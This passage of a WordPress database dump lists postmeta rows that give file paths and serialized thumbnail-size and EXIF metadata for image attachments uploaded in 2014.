6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(440, 249, '_wp_attached_file', '2014/04/global1.jpg'),
(441, 249, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:604;s:6:"height";i:410;s:4:"file";s:19:"2014/04/global1.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"global1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"global1-300x203.jpg";s:5:"width";i:300;s:6:"height";i:203;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:19:"global1-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:19:"global1-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:19:"global1-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:19:"global1-604x372.jpg";s:5:"width";i:604;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(442, 250, '_wp_attached_file', '2014/04/guarantee1.jpg'),
(443, 250, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:581;s:6:"height";i:255;s:4:"file";s:22:"2014/04/guarantee1.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"guarantee1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"guarantee1-300x131.jpg";s:5:"width";i:300;s:6:"height";i:131;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:22:"guarantee1-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:22:"guarantee1-400x255.jpg";s:5:"width";i:400;s:6:"height";i:255;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:22:"guarantee1-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(446, 253, '_wp_attached_file', '2014/04/key1.jpg'),
(447, 253, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:274;s:6:"height";i:373;s:4:"file";s:16:"2014/04/key1.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:16:"key1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:16:"key1-220x300.jpg";s:5:"width";i:220;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:16:"key1-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:16:"key1-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:16:"key1-274x372.jpg";s:5:"width";i:274;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(450, 256, '_wp_attached_file', '2014/04/lion-signature.jpg'),
(451, 256, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:1764;s:6:"height";i:413;s:4:"file";s:26:"2014/04/lion-signature.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"lion-signature-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"lion-signature-300x70.jpg";s:5:"width";i:300;s:6:"height";i:70;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"lion-signature-1024x239.jpg";s:5:"width";i:1024;s:6:"height";i:239;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:26:"lion-signature-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:26:"lion-signature-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:26:"lion-signature-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:26:"lion-signature-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:27:"lion-signature-1038x413.jpg";s:5:"width";i:1038;s:6:"height";i:413;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(486, 302, '_wp_attached_file', '2014/02/joy1.jpg'),
(487, 302, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:476;s:6:"height";i:448;s:4:"file";s:16:"2014/02/joy1.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:16:"joy1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:16:"joy1-300x282.jpg";s:5:"width";i:300;s:6:"height";i:282;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:16:"joy1-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:16:"joy1-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:16:"joy1-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:16:"joy1-476x372.jpg";s:5:"width";i:476;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(535, 384, '_wp_attached_file', '2014/04/lion-full1.jpg'),
(536, 384, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:201;s:6:"height";i:277;s:4:"file";s:22:"2014/04/lion-full1.jpg";s:5:"sizes";a:3:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"lion-full1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:22:"lion-full1-201x220.jpg";s:5:"width";i:201;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:22:"lion-full1-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(462, 265, '_wp_attached_file', '2014/04/sess7.jpg'),
(463, 265, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:460;s:6:"height";i:288;s:4:"file";s:17:"2014/04/sess7.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:17:"sess7-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:17:"sess7-300x187.jpg";s:5:"width";i:300;s:6:"height";i:187;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:17:"sess7-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:17:"sess7-400x288.jpg";s:5:"width";i:400;s:6:"height";i:288;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:17:"sess7-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(473, 295, '_wp_attached_file', '2014/04/studied1.jpg'),
(474, 295, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:388;s:6:"height";i:402;s:4:"file";s:20:"2014/04/studied1.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"studied1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"studied1-289x300.jpg";s:5:"width";i:289;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:20:"studied1-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:20:"studied1-388x400.jpg";s:5:"width";i:388;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:20:"studied1-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:20:"studied1-388x372.jpg";s:5:"width";i:388;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(476, 296, '_wp_attached_file', '2014/04/mother-daughter2.jpg'),
(477, 296, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:561;s:6:"height";i:374;s:4:"file";s:28:"2014/04/mother-daughter2.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"mother-daughter2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"mother-daughter2-300x200.jpg";s:5:"width";i:300;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:28:"mother-daughter2-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:28:"mother-daughter2-400x374.jpg";s:5:"width";i:400;s:6:"height";i:374;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:28:"mother-daughter2-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:28:"mother-daughter2-561x372.jpg";s:5:"width";i:561;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(478, 297, '_wp_attached_file', '2014/04/puddle1.jpg'),
(479, 297, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:407;s:6:"height";i:407;s:4:"file";s:19:"2014/04/puddle1.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"puddle1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"puddle1-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:19:"puddle1-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:19:"puddle1-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:19:"puddle1-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:19:"puddle1-407x372.jpg";s:5:"width";i:407;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(480, 298, '_wp_attached_file', '2014/04/react1.jpg'),
(481, 298, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:496;s:6:"height";i:360;s:4:"file";s:18:"2014/04/react1.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"react1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"react1-300x217.jpg";s:5:"width";i:300;s:6:"height";i:217;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:18:"react1-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:18:"react1-400x360.jpg";s:5:"width";i:400;s:6:"height";i:360;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:18:"react1-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(482, 299, '_wp_attached_file', '2014/04/brain2.jpg'),
(483, 299, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:450;s:6:"height";i:450;s:4:"file";s:18:"2014/04/brain2.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"brain2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"brain2-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:18:"brain2-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:18:"brain2-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:18:"brain2-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:18:"brain2-450x372.jpg";s:5:"width";i:450;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(484, 300, '_wp_attached_file', '2014/04/header-img2.jpg'),
(485, 300, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:257;s:6:"height";i:236;s:4:"file";s:23:"2014/04/header-img2.jpg";s:5:"sizes";a:3:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"header-img2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:23:"header-img2-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:23:"header-img2-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(488, 303, '_wp_attached_file', '2014/02/lion-face.jpg'),
(489, 303, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:350;s:6:"height";i:403;s:4:"file";s:21:"2014/02/lion-face.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"lion-face-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"lion-face-260x300.jpg";s:5:"width";i:260;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:21:"lion-face-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:21:"lion-face-350x400.jpg";s:5:"width";i:350;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:21:"lion-face-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:21:"lion-face-350x372.jpg";s:5:"width";i:350;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(490, 304, '_wp_attached_file', '2014/02/lion-full.jpg'),
(491, 304, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:300;s:6:"height";i:400;s:4:"file";s:21:"2014/02/lion-full.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"lion-full-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"lion-full-225x300.jpg";s:5:"width";i:225;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:21:"lion-full-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:21:"lion-full-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:21:"lion-full-300x372.jpg";s:5:"width";i:300;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(492, 305, '_wp_attached_file', '2014/02/mother-daughter1.jpg'),
(493, 305, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:300;s:6:"height";i:200;s:4:"file";s:28:"2014/02/mother-daughter1.jpg";s:5:"sizes";a:3:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"mother-daughter1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:28:"mother-daughter1-220x200.jpg";s:5:"width";i:220;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:28:"mother-daughter1-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(496, 309, '_wp_attached_file', '2014/02/mod1.jpg'),
(497, 309, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:300;s:6:"height";i:451;s:4:"file";s:16:"2014/02/mod1.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:16:"mod1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:16:"mod1-199x300.jpg";s:5:"width";i:199;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:16:"mod1-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:16:"mod1-300x400.jpg";s:5:"width";i:300;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:16:"mod1-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:16:"mod1-300x372.jpg";s:5:"width";i:300;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(538, 386, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:300;s:6:"height";i:400;s:4:"file";s:22:"2014/04/lion-full2.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"lion-full2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"lion-full2-225x300.jpg";s:5:"width";i:225;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:22:"lion-full2-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:22:"lion-full2-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:22:"lion-full2-300x372.jpg";s:5:"width";i:300;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(533, 378, '_wp_attached_file', '2014/04/bon1.jpg'),
(534, 378, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:184;s:6:"height";i:211;s:4:"file";s:16:"2014/04/bon1.jpg";s:5:"sizes";a:2:{s:9:"thumbnail";a:4:{s:4:"file";s:16:"bon1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:16:"bon1-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(537, 386, '_wp_attached_file', '2014/04/lion-full2.jpg'),
(500, 311, '_wp_attached_file', '2014/02/sess3.jpg'),
(501, 311, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:480;s:6:"height";i:320;s:4:"file";s:17:"2014/02/sess3.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:17:"sess3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:17:"sess3-300x200.jpg";s:5:"width";i:300;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:17:"sess3-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:17:"sess3-400x320.jpg";s:5:"width";i:400;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:17:"sess3-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(502, 312, '_wp_attached_file', '2014/02/sess4.jpg'),
(503, 312, '_wp_attachment_metadata', 